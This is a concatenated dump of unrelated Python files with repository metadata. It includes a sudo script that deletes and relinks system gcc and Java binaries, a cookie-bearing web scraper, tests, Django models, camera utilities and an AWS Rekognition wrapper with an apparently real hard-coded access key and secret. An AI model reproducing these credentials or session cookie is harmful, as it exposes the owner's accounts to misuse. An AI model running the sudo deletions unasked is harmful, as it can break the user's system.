execute('sudo rm -f ' + default_java_file)
execute('sudo ln -s /usr/lib/jvm/jdk' + version + ' /usr/lib/jvm/default-java')
get_version_java()
def get_version_gcc():
gcc_version_result = execute('ls -l ' + gcc_file, silent=True, catch=True)
match = re.match('.+gcc-(.+)', gcc_version_result)
if match:
gcc_version = match.group(1)
else:
error('gcc is not expected')
info('gcc version: ' + gcc_version)
def set_version_gcc():
version = args.set_version
execute('sudo rm -f /usr/bin/gcc', silent=True)
execute('sudo ln -s /usr/bin/gcc-' + version + ' /usr/bin/gcc', silent=True)
execute('sudo rm -f /usr/bin/g++', silent=True)
execute('sudo ln -s /usr/bin/g++-' + version + ' /usr/bin/g++', silent=True)
execute('sudo rm -f /usr/bin/cc', silent=True)
execute('sudo ln -s /usr/bin/gcc /usr/bin/cc', silent=True)
get_version_gcc()
if __name__ == "__main__":
handle_option()
setup()
get_version()
set_version() | [
"yang.gu@intel.com"
] | yang.gu@intel.com |
e8ad07e31379beae3dffbece9f29e72942cd9ab7 | 9f2a944624d3499555e31b384fc0611a4a834b41 | /cookies-ver.py | 906cb912efe7683f08d77f771b218d77cd7ee3c3 | [] | no_license | silver926z/cprog_parser | 8c3079c85fd92864745baf169d064b50ddf685c4 | b6f4616a26483275fb3860ca2be7a35fd854a850 | refs/heads/master | 2021-01-25T09:37:27.526275 | 2017-06-09T12:53:37 | 2017-06-09T12:53:37 | 93,858,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,518 | py |
import requests
from bs4 import BeautifulSoup
import lxml
url = "http://www.niotv.com/i_index.php?cont=day"
headers = {
"Host": "www.niotv.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:43.0) Gecko/20100101 Firefox/43.0",
"Accept": "image/png,image/*;q=0.8,*/*;q=0.5",
"Accept-Language": "zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://www.niotv.com/i_index.php?cont=day",
"Cookie": "_ga=GA1.2.1557690102.1493724956; _gid=GA1.2.710482855.1493814386; __utma=43184058.1557690102.1493724956.1493803446.1493814295.4; __utmz=43184058.1493724956.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=mhkgpmh939ue0309db2aftpvr3; __utmb=43184058.4.10.1493814296; __utmc=43184058; __utmt=1; _gat=1",
"Connection": "keep-alive",
"If-Modified-Since": "Wed, 04 May 2017 12:01:45 GMT",
"If-None-Match": "4fc99fe0-38-6b903c40"
}
form_data = {
"act": "select",
"sch_id": "20",
# "ch_name": "TVBS",
"day" : "2017-06-09",
"grp_id":"-1",
"cont":"day"
}
s = requests.Session()
_h=dict(headers)
res = s.post(url,headers=_h,data=form_data)
with open('download.html',"w") as f:
f.write(res.content)
soup = BeautifulSoup(res.content,"lxml")
# print soup
z=soup.find_all('img')
print len(z)
z = z[20]
print "##",z
print z['src']
dd=str(z)[23:-3]
print 'url',url[:-20]
# url == http://www.niotv.com/
new=url[:-20]+z['src']
img = s.get(new,headers=_h)
# print img.content
with open('tmp',"w") as f:
f.write(img.content) | [
"silver926z@gmail.com"
] | silver926z@gmail.com |
b53ae71c9ed4ce817b4e285d4827aaf89a7c7035 | 448c17f5a937f6f3d45a3b8da747348ec0b06e76 | /tests/test_pinpoint.py | 681518f7d8c06ea39ef8f2901d4525542ccda18b | [
"MIT"
] | permissive | surajitdb/pyscissor | a85f5d6c44c2e3b28d48ec61ed89b2dd98fc7c02 | 247e819d2d87c982df20ee42bce2b881e89d5f25 | refs/heads/master | 2023-01-12T02:25:53.564677 | 2020-11-18T12:15:50 | 2020-11-18T12:15:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | import unittest
import numpy as np
from pyscissor import pinpoint
import pytest
class test_scissor(unittest.TestCase):
# generel + lat not reversed
def test_generel_lnr(self):
lats = np.array([24,23])
lons = np.array([88,89])
vals = np.array([[1,2],[3,4]])
t = pinpoint(lats,lons)
t.set_xy(23.6,88.6)
self.assertLess( abs( ( 3.6+ 0.6* (1.6-3.6) ) - t.bilinear(vals) ), 0.00001)
# generel + lat reversed
def test_generel_lr(self):
lats = np.array([23,24])
lons = np.array([88,89])
vals = np.array([[1,2],[3,4]])
t = pinpoint(lats,lons)
t.set_xy(23.6,88.6)
self.assertLess(abs( ( 1.6 + 0.6* (3.6-1.6) ) - t.bilinear(vals) ), 0.00001)
if __name__ == '__main__':
unittest.main() | [
"nzahasan@gmail.com"
] | nzahasan@gmail.com |
4de8e6f3f997c044235468a34eb39dc9ca07df91 | df458ae26f8e1b59e4fc4273701f77cc2e340a3c | /tests/test_viewgroups.py | a7c869008bd24a94bbc80a387a23758393244f2e | [
"BSD-3-Clause"
] | permissive | radiac/django-fastview | 64bcf3f07ed62a1863b5a402d1fedc998ed433f3 | daf898f416c3f89efc3ef290f8158232d055af36 | refs/heads/develop | 2023-03-20T22:49:14.789026 | 2022-10-02T19:43:22 | 2022-10-02T19:43:22 | 230,815,383 | 13 | 1 | NOASSERTION | 2023-03-04T05:44:10 | 2019-12-29T23:26:56 | Python | UTF-8 | Python | false | false | 1,637 | py | """
Test viewgroup
"""
from fastview import permissions
from fastview.viewgroups import ModelViewGroup
from .app.models import Entry
def test_modelviewgroup_permissions__permissions_set_on_subclass():
class TestPermission(permissions.Permission):
pass
test_permission = TestPermission()
class Entries(ModelViewGroup):
permission = test_permission
model = Entry
# Permissions are set at instantiation
entries = Entries()
assert entries.index_view.get_permission() == test_permission
assert entries.detail_view.get_permission() == test_permission
assert entries.create_view.get_permission() == test_permission
assert entries.update_view.get_permission() == test_permission
assert entries.delete_view.get_permission() == test_permission
# Not at definition
assert isinstance(Entries.index_view.get_permission(), permissions.Denied)
assert isinstance(Entries.detail_view.get_permission(), permissions.Denied)
assert isinstance(Entries.create_view.get_permission(), permissions.Denied)
assert isinstance(Entries.update_view.get_permission(), permissions.Denied)
assert isinstance(Entries.delete_view.get_permission(), permissions.Denied)
def test_modelviewgroup_index__index_lists(add_url, client, user_owner):
class Entries(ModelViewGroup):
permission = permissions.Public()
model = Entry
Entry.objects.create(author=user_owner)
Entry.objects.create(author=user_owner)
add_url("", Entries().include(namespace="entries"))
response = client.get("/")
assert len(response.context_data["object_list"]) == 2
| [
"git@radiac.net"
] | git@radiac.net |
6d7552c80362211c8655afa1523750f82b5f34b9 | cbdbb05b91a4463639deefd44169d564773cd1fb | /djangoproj/forms_lab/lab/models.py | a49bb957d8bc48b023dce230a3be6f848e11e28a | [] | no_license | blazprog/py3 | e26ef36a485809334b1d5a1688777b12730ebf39 | e15659e5d5a8ced617283f096e82135dc32a8df1 | refs/heads/master | 2020-03-19T20:55:22.304074 | 2018-06-11T12:25:18 | 2018-06-11T12:25:18 | 136,922,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | from django.db import models
class Nakup(models.Model):
datum_nakupa = models.DateField()
trgovina = models.CharField(max_length=30)
class NakupIzdelki(models.Model):
nakup = models.ForeignKey(Nakup)
izdelek = models.CharField(max_length=30)
kolicina = models.IntegerField(default=1)
cena = models.FloatField(default=0)
| [
"blaz.korosec@mentis.si"
] | blaz.korosec@mentis.si |
85459e0cbd82140fa14886b0e5285bd8b8a76a28 | b1303152c3977a22ff9a0192c0c32310e65a6d77 | /python/567.permutation-in-string.py | c5487e09f925108dce4b4931b43c66fadd915fda | [
"Apache-2.0"
] | permissive | stavanmehta/leetcode | 1b8da1c2bfacaa76ddfb96b8dbce03bf08c54c27 | 1224e43ce29430c840e65daae3b343182e24709c | refs/heads/master | 2021-07-15T16:02:16.107962 | 2021-06-24T05:39:14 | 2021-06-24T05:39:14 | 201,658,706 | 0 | 0 | Apache-2.0 | 2021-06-24T05:39:15 | 2019-08-10T16:59:32 | Java | UTF-8 | Python | false | false | 81 | py | class Solution:
def checkInclusion(self, s1: str, s2: str) -> bool:
| [
"noreply@github.com"
] | noreply@github.com |
a6c3b2d3c30d77febcd634cf65a7f06d7baf74a8 | bd408f54b0bcd9c37c2fe38195a1caa3480c1d68 | /library/rekognition.py | 96c999a38a26a64154d6dafd33615b95b7d5ac07 | [] | no_license | clara081094/refactoredRekognition | 601c33396dbeb9cf2d799537e85beb6d7bc712c8 | 4f61d2727a22c6de021a6d28077fa5cc3aabb02e | refs/heads/master | 2023-09-04T03:15:08.615401 | 2019-02-01T19:11:35 | 2019-02-01T19:11:35 | 168,747,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import boto3
import json
#from botocore.exceptions import ClientError
class Rekognition(object):
def __init__(self):
self.client = boto3.client(
'rekognition',
region_name="us-east-1",
aws_access_key_id="AKIAIMM524QL43QPT43A",
aws_secret_access_key="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"
)
def detect_faces(self,bytess):
response = self.client.detect_faces(
Image={'Bytes': bytess }, Attributes=['ALL'])
return response
def face_recog(self,bytess,collectionId):
try:
response = self.client.search_faces_by_image(
CollectionId=collectionId,
Image={
'Bytes': bytess
},
FaceMatchThreshold=75
)
return response
except:
print("Error over face")
return "BAD"
def index_faces(self,bytess,collectionId,idImage):
try:
response = self.client.index_faces(
Image={'Bytes': bytess}, CollectionId=collectionId, ExternalImageId=idImage)
return response
except:
print("Error over face")
return "BAD"
| [
"clara.081094@gmail.com"
] | clara.081094@gmail.com |
6653c822271f595c1ee6011406a88613852cd291 | 3325f16c04ca8e641cbd58e396f983542b793091 | /Seção 13 - Leitura e Escrita em Arquivos/Exercícios da Seção/Exercício_04.py | 3140f4c4229bb75d6849a37c399fbae14f608b1f | [] | no_license | romulovieira777/Programacao_em_Python_Essencial | ac929fbbd6a002bcc689b8d6e54d46177632c169 | e81d219db773d562841203ea370bf4f098c4bd21 | refs/heads/master | 2023-06-11T16:06:36.971113 | 2021-07-06T20:57:25 | 2021-07-06T20:57:25 | 269,442,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | """
4) Faça um programa que receba do usuário um arquivo texto e mostre na tela
quantas letras são vogais e quantas são consoantes
"""
from Exercício_03 import conta_vogais
def conta_consoantes(txt):
"""Retorna a quantidade de consoantes que existe no texto recebido por parâmetro.
Caso o que for recebido por parâmetro não seja uma string, retornará um valor do tipo None"""
try:
consoantes = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n',
'p', 'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']
txt = txt.lower()
qtd = 0
for consoante in consoantes:
qtd += txt.count(consoante)
return qtd
except AttributeError:
return None
if __name__ == '__main__':
nome_arquivo = str(input("Digite o caminho do arquivo ou o nome do arquivo "
"(caso o arquivo esteja no mesmo local do programa): "))
nome_arquivo = nome_arquivo if ".txt" in nome_arquivo else nome_arquivo + ".txt"
try:
with open(nome_arquivo, 'r', encoding='utf-8') as arquivo:
texto = arquivo.read()
print(f"\nO arquivo texto tem {conta_vogais(texto)} vogais e {conta_consoantes(texto)} consoantes!")
except FileNotFoundError:
print("\nArquivo informado não encontrado!")
except OSError:
print("\nO SO não aceita caracteres especiais em nomes de arquivo!")
| [
"romulo.vieira777@gmail.com"
] | romulo.vieira777@gmail.com |
eed858b8e82142df84227a811836ca3ac041cc93 | f74602a8f37fc9357ba7d638ada8f0df8e2d85c1 | /CFG.py | da09e3c8ab87ee2df8b5323b4fb99de443f08c81 | [] | no_license | VictorTonyXie/PDA2Chomsky | 128d34f580bbdf38aec4688e5f9f284330184d98 | 5014f463f8780fb54f25f3d6cd2d0c7bf3cc5a4f | refs/heads/main | 2023-02-10T16:24:56.513324 | 2021-01-03T11:23:39 | 2021-01-03T11:23:39 | 326,349,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,211 | py | class CFG:
variables: list[str] = []
terminals: list[str] = []
start_variable: str
production_rules: dict[str, list[list[str]]] = {}
def __init__(self, variables: list[str], terminals: list[str], start_variable):
self.variables = variables.copy()
self.terminals = terminals.copy()
self.start_variable = start_variable
for v in self.variables:
self.production_rules[v] = []
def isTerminal(self, ident: str):
return ident in self.terminals
def isNonTerminal(self, ident: str):
return ident in self.variables
def addRule(self, left: str, right: list[str]):
self.production_rules[left].append(right.copy())
def __str__(self, epsilon="ε"):
ret = "\n".join([f"{nont} -> {' | '.join([' '.join(single_rule) if len(single_rule) > 0 else epsilon for single_rule in self.production_rules[nont]])}" for nont in self.production_rules])
return ret
if __name__ == "__main__":
cfg = CFG(["S", "A", "B", "C"], ["a", "b"], "S")
cfg.addRule("S", ["A", "a", "B"])
cfg.addRule("A", ["a", "A"])
cfg.addRule("A", [])
cfg.addRule("B", ["b", "B"])
cfg.addRule("B", [])
print(cfg)
| [
"taoxie2006@126.com"
] | taoxie2006@126.com |
390b2f724eeeaf6d0e23372bb737c97147f3ea23 | 415e11fbf113512c3b2081a55796bcddc652b34e | /main_app/urls.py | c1775d5a977858c3a241602eb866ef810f1db2f1 | [] | no_license | cooperama/candy-collector-v2.0 | e51cdbcd67071e0423c22038843f96939fb04cc8 | 26cb58d875313693a5ec477a5bbe4efb204d9017 | refs/heads/master | 2023-02-03T13:46:39.190537 | 2020-10-31T21:33:13 | 2020-10-31T21:33:13 | 322,905,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | from django.urls import path
from . import views
urlpatterns = [
# Static
path('', views.home, name='home'),
path('about/', views.about, name='about'),
# Candy
path('candy/', views.candy_index, name='candy_index'),
path('candy/<int:candy_id>/', views.candy_detail, name='candy_detail'),
path('stores/<int:store_id>/candy/new/', views.add_candy, name='add_candy'),
# Seller(user)
path('accounts/signup/', views.signup, name='signup'),
# Stores
path('stores/', views.stores_index, name='stores_index'),
path('userstores/', views.user_stores, name='user_stores'),
path('stores/<int:store_id>/', views.store_detail, name='store_detail'),
] | [
"coope133@gmail.com"
] | coope133@gmail.com |
ff91889dcdaa347c138e4b81f3c25c581ec6ac76 | f3c380495cda1fe7d791c421216bc3d373b44b5a | /lambda.py | ef1b5c3f683d7538fc93d2b877bc9f34727b55ee | [] | no_license | siwangqishiq/PythonLearn | 01c63703b1dafbf4eec27a7b6e6846413045efb3 | 275b1becb1be9cca566956e6f58088e983e68208 | refs/heads/master | 2021-08-23T10:19:52.189996 | 2017-11-12T06:33:20 | 2017-11-12T06:33:20 | 105,995,836 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 262 | py |
def main():
data = [{"name":"毛利兰","age":17},{"name":"工藤新","age":18},{"name":"鲁鲁修","age":16},{"name":"夜神月","age":20}]
for d in data:
print(d)
print("="*50)
data.sort(key = lambda x:x["age"])
for d in data:
print(d)
main()
| [
"525647740@qq.com"
] | 525647740@qq.com |
34a8a5d6bf82521b2d655e068ef808d27f366861 | 13fa7bc8ac70b217382459a136b0125813328410 | /Util/SocketServer.py | bb3a83b9d06070420d323a74df2e648676fb1875 | [] | no_license | Leia1002/Rizhao-master0803 | ca8ba452aa52d99301aec0a120690729d49ce90d | b5d2427eb96068fdcaa57402ad3b11f36aca3736 | refs/heads/master | 2020-03-25T04:44:10.661627 | 2018-08-28T12:45:33 | 2018-08-28T12:45:33 | 143,410,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,611 | py | # -*- coding: utf-8 -*-
import threading
import time
from Util.Dispatch import Dispatch
'''
此处以后再加入java互动
开始线程,本类其实是一个定时器作用
'''
class SocketServer(object):
def everyMonth(self):
while True:
lock = True
# todo:bug 此处循环无数次,如何设置为一次
if time.strftime("%d") == '1' and lock == True:
dispatchInstantiation = Dispatch()
dispatchInstantiation.dispatch('everyMonth')
lock = False
pass
if time.strftime("%d") == '2':
lock = True
def everyDay(self):
while True:
current_time = time.localtime(time.time())
if (current_time.tm_hour == 0) and (current_time.tm_min == 0) and (current_time.tm_sec == 0):
dispatchInstantiation = Dispatch()
dispatchInstantiation.dispatch('everyDay')
time.sleep(1)
pass
def everyHour(self):
while True:
current_time = time.localtime(time.time())
if (current_time.tm_min == 0) and (current_time.tm_sec == 0):
dispatchInstantiation = Dispatch()
dispatchInstantiation.dispatch('everyHour')
time.sleep(1)
def startProject(self):
t1 = threading.Thread(target=self.everyHour, name='everyHour')
t2 = threading.Thread(target=self.everyDay, name='everyDay')
t3 = threading.Thread(target=self.everyMonth, name='everyMonth')
t1.start()
t2.start()
t3.start()
| [
"mafei@Hisense.ad"
] | mafei@Hisense.ad |
4ef4c33489c9c34b2e73cd65241fe22cde9f4cb9 | 6a5732f38be806ffa0a8f44a687e74035fab24b8 | /factory-ai-vision/EdgeSolution/modules/PredictModule/utility.py | d810717a8e61be9ed01af770a35147dd2f4db344 | [
"MIT"
] | permissive | dlepow/azure-intelligent-edge-patterns | ccf92a29c95a419cae29142fb620a2bc14745f44 | 60ca7203115bdf26932e7bc037c37b2a7dac5756 | refs/heads/master | 2023-03-09T17:22:03.827655 | 2021-02-05T14:19:00 | 2021-02-05T14:19:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,243 | py | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
import glob
import json
import logging
import os
import shutil
import socket
import subprocess
import subprocess as sp
import sys
import time
import urllib.request as urllib2
import zipfile
from urllib.request import urlopen
import cv2
from azure.iot.device import IoTHubModuleClient
logger = logging.getLogger(__name__)
# this function returns the device ip address if it is apublic ip else 127.0.0.1
def getWlanIp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(("10.255.255.255", 1))
IP = s.getsockname()[0]
if IP.split(".")[0] == "172":
print("Ip address detected is :: " + IP)
IP = "172.17.0.1"
print("Ip address changed to :: " +
IP + "to avoid docker interface")
print("Ip address detected is :: " + IP)
except:
IP = "172.17.0.1"
finally:
s.close()
return IP
# this function prepare the camera folder clears any previous models that the device may have
def prepare_folder(folder):
print("Preparing: %s", folder)
if os.path.isdir(folder):
print("Found directory cleaning it before copying new files...")
# ToDo delete all files in folder
shutil.rmtree(folder, ignore_errors=True)
os.makedirs(folder, exist_ok=True)
else:
os.makedirs(folder, exist_ok=True)
def WaitForFileDownload(FileName):
# ----------------------------------------------------
# Wait until the end of the download
# ----------------------------------------------------
valid = 0
while valid == 0:
try:
with open(FileName):
valid = 1
except IOError:
print("Still downloading...", flush=True)
time.sleep(1)
print("Got it ! File Download Complete !", flush=True)
def get_file(url, dst_folder="/app/vam_model_folder"):
# adding code to fix issue where the file name may not be part of url details here
remotefile = urlopen(url)
myurl = remotefile.url
FileName = myurl.split("/")[-1]
if FileName:
# find root folders
dirpath = os.getcwd()
# src = os.path.join(dirpath,"model")
dst = os.path.abspath(dst_folder)
logger.info("Downloading File :: %s", FileName)
urllib2.urlretrieve(url, filename=(os.path.join(dst, FileName)))
WaitForFileDownload(os.path.join(dst, FileName))
return True
else:
print("Cannot extract file name from URL")
return False
def get_file_zip(url, dst_folder="model"):
# adding code to fix issue where the file name may not be part of url details here
#
print("Downloading: %s" % url, flush=True)
remotefile = urlopen(url)
myurl = remotefile.url
FileName = myurl.split("/")[-1]
print(FileName, flush=True)
if FileName:
# find root folders
dirpath = os.getcwd()
dirpath_file = os.path.join(dirpath, dst_folder)
src = os.path.abspath(dirpath_file)
src_file_path = os.path.join(src, FileName)
print("Location to download is :: %s" % src_file_path, flush=True)
prepare_folder(dirpath_file)
print("Downloading File :: %s" % FileName, flush=True)
# urllib2.urlretrieve(url, filename=src_file_path)
subprocess.run(["wget", "-O", src_file_path, url])
print("Downloading File :: %s, complete!" % FileName, flush=True)
print("Unzip and move...", flush=True)
print(
"src_file_path: {}, dst_file_path: {}".format(
src_file_path, dst_folder),
flush=True,
)
result = unzip_and_move(src_file_path, dst_folder)
print("Unzip and move... Complete!", flush=True)
return result
else:
print("Cannot extract file name from URL", flush=True)
return False
def unzip_and_move(file_path=None, dst_folder="model"):
# print("files unzipped to : %s" % dst_folder, flush=True)
# zip_ref = zipfile.ZipFile(file_path, "r")
# print("1", flush=True)
# dirpath = os.getcwd()
# print("2", flush=True)
# dirpath_file = os.path.join(dirpath, dst_folder)
# print("3", flush=True)
# zip_ref.extractall(dirpath_file)
# print("4", flush=True)
# zip_ref.close()
# print("files unzipped to : %s, Complete" % dirpath_file, flush=True)
# transferdlc(True,"twin_provided_model")
subprocess.run(["unzip", file_path, "-d", dst_folder])
return True
# thsi function pushes a new model to device to location /data/misc/camera mounted at /app/vam_model_folder
def transferdlc(pushmodel=None, src_folder="model"):
# if pushmodel.find("True") == -1 :
if not pushmodel:
# checking and transferring model if the devie does not have any tflite or .dlc file on it..
if checkmodelexist():
print(
"Not transferring model as transfer from container is disabled by settting pushmodel to False"
)
return
else:
print(
" transferring model as the device does not have any model on it even if pushmodel is set to False"
)
else:
print(
"transferring model ,label and va config file as set in create option with -p %s passed"
% pushmodel
)
# find root folders
dirpath = os.getcwd()
src = os.path.join(dirpath, src_folder)
dst = os.path.abspath("/app/vam_model_folder")
# find model files
vamconfig_file = find_file(src, "va-snpe-engine-library_config.json")
with open(vamconfig_file) as f:
vamconfig = json.load(f)
dlc_file = find_file(src, vamconfig["DLC_NAME"])
label_file = find_file(src, vamconfig["LABELS_NAME"])
files = [vamconfig_file, dlc_file, label_file]
print("Found model files: {} in {}".format(files, src))
# clean up
prepare_folder(dst)
# copy across
for filename in files:
print("transfering file :: " + filename)
shutil.copy(os.path.join(filename), dst)
def checkmodelexist():
# for file in os.listdir(os.path.abspath("/app/vam_model_folder")):
# if file.endswith(".dlc") or file.endswith(".tflite"):
if glob.glob("/app/vam_model_folder/*.dlc"):
return True
else:
print("No dlc or tflit model on device")
return False
def send_system_cmd(cmd):
print("Command we are sending is ::" + cmd)
returnedvalue = sp.call(cmd, shell=True)
print("returned-value is:" + str(returnedvalue))
# this function will find the required files to be transferred to the device
def find_file(input_path, suffix):
files = [
os.path.join(dp, f)
for dp, dn, filenames in os.walk(input_path)
for f in filenames
if f == suffix
]
if len(files) != 1:
raise ValueError(
"Expecting a file ending with %s file as input. Found %s in %s. Files: %s"
% (suffix, len(files), input_path, files)
)
return os.path.join(input_path, files[0])
# get the model path from confgiuartion file only used by Azure machine learning service path
def getmodelpath(model_name):
with open(os.path.join(sys.path[0], "model_config_map.json")) as file:
data = json.load(file)
print(data)
# toDo Change the hardcoded QCOmDlc below with value read
# print(data['models'][0])
models = data["models"]
if len(models.keys()) == 0:
raise ValueError("no models found")
if model_name is None:
# default to the first model
model_name, model_data = models.popitem()
else:
model_data = models[model_name]
# construct the path
model_id = model_data["id"]
print("using model %s" % model_id)
mydata = model_id.split(":")
model_path = os.path.join(*mydata)
return model_path
def normalize_rtsp(rtsp: str) -> str:
"""normalize_rtsp.
RTSP://xxx => rtsp://
Args:
rtsp (str): rtsp
Returns:
str: normalized_rtsp
"""
normalized_rtsp = rtsp
if isinstance(rtsp, str) and rtsp.lower().find("rtsp") == 0:
normalized_rtsp = "rtsp" + rtsp[4:]
return normalized_rtsp
# if __name__ == "__main__":
# get_file_zip("https://yadavsrorageaccount01.blob.core.windows.net/visionstoragecontainer/a5719e7549c044fcaf83381a22e3d0b2.VAIDK.zip","twin_provided_model")
def draw_label(img, text, pos, rectangle_color=(255, 255, 255), text_color=(0, 0, 0)):
font = cv2.FONT_HERSHEY_SIMPLEX
font_scale = 0.3
thickness = 1
x, y = pos
img = cv2.rectangle(
img, (x, y - 15), (x + len(text) * 5 + 10, y), rectangle_color, -1
)
img = cv2.putText(
img, text, (x + 5, y - 5), font, font_scale, text_color, thickness
)
return img
try:
iot = IoTHubModuleClient.create_from_edge_environment()
except Exception:
iot = None
def is_edge():
"""is_edge.
"""
try:
IoTHubModuleClient.create_from_edge_environment()
return True
except Exception:
return False
| [
"ronpai0919@gmail.com"
] | ronpai0919@gmail.com |
5175327d4e1008c88bb99408d5bb2c97b9319872 | 9a116b59c4f05e18a4899dd4aa544e9f73e4a680 | /main.py | 4c353f3f34d07ead92107133e104399fa1c1cef4 | [
"MIT"
] | permissive | grostein/security_cam_storage_App_Engine | 3734e11996a682ad07b0993dc479cd97ee665b8f | b4cceeeff1468068cb03b68efa6300d620c026a6 | refs/heads/master | 2021-01-10T10:58:37.406210 | 2015-12-30T10:57:28 | 2015-12-30T10:57:28 | 48,793,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,963 | py | import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
from modelli import *
from datetime import datetime, timedelta
from email import email
import logging
def sicurezza(self):
user = users.get_current_user()
if user:
if user.email() == email:
pass
else:
self.redirect('/privato')
else:
self.redirect(users.create_login_url("/"))
class ViewHandler(webapp2.RequestHandler):
def get(self, fileid):
k = ndb.Key(UserFile, fileid)
userfile = k.get()
self.response.headers['Content-Type'] = 'image'
self.response.write(userfile.filedata)
class LastHandler(webapp2.RequestHandler):
def get(self):
yesterday = datetime.now() - timedelta(1)
qry = UserFile.query(UserFile.date > yesterday).order(-UserFile.date).fetch(1)
self.redirect('/view_file/%s' % qry[0].filename)
class PrivatoHandler(webapp2.RequestHandler):
def get(self):
self.response.write('Questa pagina è privata. Accesso severamente vietato!')
class PuliziaHandler(webapp2.RequestHandler):
def get(self):
yesterday = datetime.now() - timedelta(5)
qry = UserFile.query(UserFile.date < yesterday).order(UserFile.date).fetch(1000)
for elemento in qry:
a = elemento.key.delete()
def html(self, mobile=False):
yesterday = datetime.now() - timedelta(2)
qry = UserFile.query(UserFile.date > yesterday).order(-UserFile.date)
if mobile == True:
qry = qry.fetch(12)
testo = ''
for elemento in qry:
testo += '<div class="col-xs-6 col-md-2"><a href="/view_file/%s" class="thumbnail"> <img src="/view_file/%s"></a>' % (elemento.filename, elemento.filename)
testo += '<div class="caption"> <p class="text-info">%s</p> </div> </div>' % elemento.date
self.response.write('''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Sicurezza</title>
<link href="css/bootstrap.min.css" rel="stylesheet">
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container-fluid">
%s
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>''' % testo)
class MainHandler(webapp2.RequestHandler):
def get(self):
sicurezza(self)
html(self)
class MobileHandler(webapp2.RequestHandler):
def get(self):
sicurezza(self)
html(self, mobile=True)
app = webapp2.WSGIApplication([('/', MainHandler),
('/privato', PrivatoHandler),
('/last', LastHandler),
('/pulizia', PuliziaHandler),
('/mobile', MobileHandler),
('/view_file/([^/]+)?', ViewHandler)
], debug=True) | [
"massimiliano@iviaggidellemeraviglie.com"
] | massimiliano@iviaggidellemeraviglie.com |
744efb60853dbb0d6435abca149d3b53b7da4457 | 641ff329536c95de473e9dfdeeb844f0eb6948b6 | /backend/tests/search/query_builder/test_create_query_filter.py | 01dc341f947b762f606816180ad34570ab6be609 | [
"MIT"
] | permissive | dnum-mi/cartographie-donnees | 573a852f685180c7a6657f11a977ecedf7f0541d | 26850923764ab4173b6824dff5c6bb3dbb753915 | refs/heads/main | 2023-08-16T04:26:41.158107 | 2023-01-20T13:01:14 | 2023-01-20T13:01:14 | 416,670,629 | 11 | 7 | MIT | 2023-03-30T14:29:31 | 2021-10-13T09:24:45 | JavaScript | UTF-8 | Python | false | false | 3,778 | py | from typing import List
from pytest_unordered import unordered
from app.models import Organization
from app.search.enums import Strictness
from app.search.query_builder import create_query_filter
def test_query_with_filters_and_text(sample_organizations: List[Organization]):
query = create_query_filter(
'test',
{'organization': ['MI > DGPN', 'INSEE > SG']},
Strictness.ALL_WORDS,
'mots à exclure',
['name', 'description'],
)
assert query == {
'query': {
'bool': {
"must": [{
'query_string': {
'query': '*test*',
'default_operator': 'AND',
'fields': ['name', 'description'],
},
}, {
"bool": {
"should": unordered([{
'term': {
"organization_name.keyword": 'MI > DGPN'
}
}, {
'term': {
"organization_name.keyword": 'INSEE > SG'
}
}]),
"minimum_should_match": 1
}
}],
"must_not": {
'query_string': {
'query': '*mots* *à* *exclure*',
'fields': ['name', 'description'],
}
}
}
},
}
def test_query_only_with_text(sample_organizations: List[Organization]):
query = create_query_filter(
'test',
{},
Strictness.ALL_WORDS,
'mots à exclure',
['name', 'description'],
)
assert query == {
'query': {
'bool': {
"must": [{
'query_string': {
'query': '*test*',
'default_operator': 'AND',
'fields': ['name', 'description'],
},
}],
"must_not": {
'query_string': {
'query': '*mots* *à* *exclure*',
'fields': ['name', 'description'],
}
}
}
}
}
def test_query_only_with_filters(sample_organizations: List[Organization]):
query = create_query_filter(
'',
{'organization': ['MI > DGPN', 'INSEE > SG']},
Strictness.ALL_WORDS,
'mots à exclure',
['name', 'description'],
)
assert query == {
'query': {
'bool': {
"must": [{
"bool": {
"should": unordered([{
'term': {
"organization_name.keyword": 'MI > DGPN'
}
}, {
'term': {
"organization_name.keyword": 'INSEE > SG'
}
}]),
"minimum_should_match": 1
}
}],
"must_not": {
'query_string': {
'query': '*mots* *à* *exclure*',
'fields': ['name', 'description'],
}
}
}
},
}
def test_blank_query():
query = create_query_filter(
'',
{},
Strictness.ALL_WORDS,
'mots à exclure',
['name', 'description'],
)
assert query == {
'query': {
'match_all': {},
},
}
| [
"yann.carfantan@artelys.com"
] | yann.carfantan@artelys.com |
